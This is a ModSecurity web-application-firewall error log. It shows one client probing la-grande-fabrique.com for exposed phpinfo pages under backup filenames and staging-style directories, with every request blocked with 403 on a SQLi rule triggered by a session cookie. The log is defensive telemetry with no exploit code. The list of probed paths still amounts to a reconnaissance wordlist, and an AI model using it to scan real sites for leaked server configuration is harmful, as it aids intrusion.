[Mon May 11 16:34:02.036119 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.bak"] [unique_id "agHo2vy_GXSWIKeli0v1rQAAAIg"]
[Mon May 11 16:34:02.036328 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.bak"] [unique_id "agHo2vy_GXSWIKeli0v1rQAAAIg"]
[Mon May 11 16:34:02.036570 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.bak"] [unique_id "agHo2vy_GXSWIKeli0v1rQAAAIg"]
[Mon May 11 16:34:02.194314 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.old"] [unique_id "agHo2vy_GXSWIKeli0v1rgAAAIg"]
[Mon May 11 16:34:02.194511 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.old"] [unique_id "agHo2vy_GXSWIKeli0v1rgAAAIg"]
[Mon May 11 16:34:02.194758 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.old"] [unique_id "agHo2vy_GXSWIKeli0v1rgAAAIg"]
[Mon May 11 16:34:02.352646 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php~"] [unique_id "agHo2vy_GXSWIKeli0v1rwAAAIg"]
[Mon May 11 16:34:02.352890 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php~"] [unique_id "agHo2vy_GXSWIKeli0v1rwAAAIg"]
[Mon May 11 16:34:02.353135 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php~"] [unique_id "agHo2vy_GXSWIKeli0v1rwAAAIg"]
[Mon May 11 16:34:02.514379 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/info.php.bak"] [unique_id "agHo2vy_GXSWIKeli0v1sgAAAIg"]
[Mon May 11 16:34:02.514582 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/info.php.bak"] [unique_id "agHo2vy_GXSWIKeli0v1sgAAAIg"]
[Mon May 11 16:34:02.514835 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/info.php.bak"] [unique_id "agHo2vy_GXSWIKeli0v1sgAAAIg"]
[Mon May 11 16:34:02.672868 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.save"] [unique_id "agHo2vy_GXSWIKeli0v1swAAAIg"]
[Mon May 11 16:34:02.673063 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.save"] [unique_id "agHo2vy_GXSWIKeli0v1swAAAIg"]
[Mon May 11 16:34:02.673307 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php.save"] [unique_id "agHo2vy_GXSWIKeli0v1swAAAIg"]
[Mon May 11 16:34:02.831025 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/staging/phpinfo.php"] [unique_id "agHo2vy_GXSWIKeli0v1tAAAAIg"]
[Mon May 11 16:34:02.831239 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/staging/phpinfo.php"] [unique_id "agHo2vy_GXSWIKeli0v1tAAAAIg"]
[Mon May 11 16:34:02.831480 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/staging/phpinfo.php"] [unique_id "agHo2vy_GXSWIKeli0v1tAAAAIg"]
[Mon May 11 16:34:02.989144 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/beta/phpinfo.php"] [unique_id "agHo2vy_GXSWIKeli0v1tgAAAIg"]
[Mon May 11 16:34:02.989359 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/beta/phpinfo.php"] [unique_id "agHo2vy_GXSWIKeli0v1tgAAAIg"]
[Mon May 11 16:34:02.989603 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/beta/phpinfo.php"] [unique_id "agHo2vy_GXSWIKeli0v1tgAAAIg"]
[Mon May 11 16:34:03.147494 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/uat/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1twAAAIg"]
[Mon May 11 16:34:03.147702 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/uat/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1twAAAIg"]
[Mon May 11 16:34:03.147928 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/uat/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1twAAAIg"]
[Mon May 11 16:34:03.305510 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/qa/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1uAAAAIg"]
[Mon May 11 16:34:03.305695 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/qa/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1uAAAAIg"]
[Mon May 11 16:34:03.305910 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/qa/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1uAAAAIg"]
[Mon May 11 16:34:03.464664 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/preview/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1ugAAAIg"]
[Mon May 11 16:34:03.464859 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/preview/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1ugAAAIg"]
[Mon May 11 16:34:03.465088 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/preview/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1ugAAAIg"]
[Mon May 11 16:34:03.622826 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/www/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1uwAAAIg"]
[Mon May 11 16:34:03.623035 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/www/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1uwAAAIg"]
[Mon May 11 16:34:03.623311 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/www/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1uwAAAIg"]
[Mon May 11 16:34:03.781402 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1vAAAAIg"]
[Mon May 11 16:34:03.781606 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1vAAAAIg"]
[Mon May 11 16:34:03.781857 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/htdocs/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1vAAAAIg"]
[Mon May 11 16:34:03.939774 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/public_html/phpinfo.php"] [unique_id "agHo2_y_GXSWIKeli0v1vQAAAIg"]
